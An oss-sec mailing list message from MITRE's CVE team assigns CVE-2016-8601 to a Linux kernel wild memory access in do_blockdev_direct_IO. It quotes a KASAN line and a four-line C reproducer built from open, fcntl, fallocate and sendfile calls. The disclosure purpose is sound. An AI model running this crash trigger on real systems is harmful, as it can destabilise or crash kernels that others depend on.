oss-sec mailing list archives

Re: linux kernel do_blockdev_direct_IO invalid memory access


From: cve-assign () mitre org
Date: Tue, 11 Oct 2016 12:27:08 -0400 (EDT)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

BUG: KASAN: wild-memory-access on address 0005080000000000
https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b

  int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40);
  fcntl(fd, 4, 0x44000, 0, 0, 0);
  fallocate(fd, 0, 0x21, 0xafa6);
  sendfile(fd, fd, &offset, 0x800);

Use CVE-2016-8601.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]

